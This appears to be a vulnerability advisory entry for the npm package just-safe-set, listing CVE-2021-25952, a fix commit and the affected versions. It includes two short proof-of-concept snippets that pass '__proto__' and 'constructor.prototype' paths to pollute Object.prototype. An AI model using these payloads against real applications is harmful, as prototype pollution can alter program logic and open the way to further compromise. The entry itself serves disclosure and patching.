set value at property, create intermediate properties if necessary
Latest version: 2.2.2
| CVE | Fix |
|---|---|
| CVE-2021-25952 | https://github.com/angus-c/just/commit/dd57a476f4bb9d78c6f60741898dc04c71d2eb53 |
const set = require('just-safe-set');
set({}, '__proto__.a', 'b');
if (({}).a === 'b') console.log('exploitable');Vulnerable versions: 1.0.0 1.1.0 2.0.0 2.0.1 2.1.0 2.2.0 2.2.1
const set = require('just-safe-set');
set({}, 'constructor.prototype.a', 'b');
if (({}).a === 'b') console.log('exploitable');Vulnerable versions: 1.0.0 1.1.0